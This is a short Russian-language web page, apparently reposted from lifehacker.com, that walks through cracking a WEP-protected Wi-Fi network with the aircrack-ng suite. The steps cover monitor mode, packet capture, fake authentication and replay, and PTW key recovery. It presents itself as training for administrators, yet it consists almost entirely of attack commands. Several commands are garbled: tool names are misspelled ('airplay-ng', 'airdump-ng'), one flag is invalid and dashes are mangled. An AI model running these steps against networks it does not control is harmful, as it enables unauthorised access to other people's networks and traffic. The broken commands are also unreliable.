Взлом WPE

Этот материал предназначен для системных администраторов с целью обучения и предотвращения взлома беспроводной сети, на основе WEP алгоритма шифрования.

ifconfig wlan0 up
iwpriv wlan0 forceprism 1
iwpriv wlan0 rfmontx 1
iwconfig wlan0 mode monitor
airmon-ng start wlan0

Запускаем монитор сети
airodump-ng -c 6 wlan0

Ждем пока появится соединение с клиентом
Выделяем и копируем BSSID, и вставляем его в текстовый документ (новый создаем)
Выделяем и копируем STATION (Client MAC), тоже вставляем в этот документ

В первом окне пишем команду (но не нажимаем Enter!!!):
airplay-ng —airplay -b [BSSID] -h [MAC] wlan0
Создаем второе окно терминала с командой (fake autentication):
airplay-ng -1 0 -a [BSSID] -h [MAC] -e  Ingram1 wlan0
Мониторим процесс

Открываем третье окно терминала
airdump-ng -c 6 —bssid [BSSID] -w gramcap wlan0

Когда данные достигнут 80.000-100.000 —
в четвертом окне терминала запускаем PTW функцию aircrack для ключа:
aircrack-ng -z gramcap-01.cap

По материалам: lifehacker.com

Взлом WPE

Добавить комментарий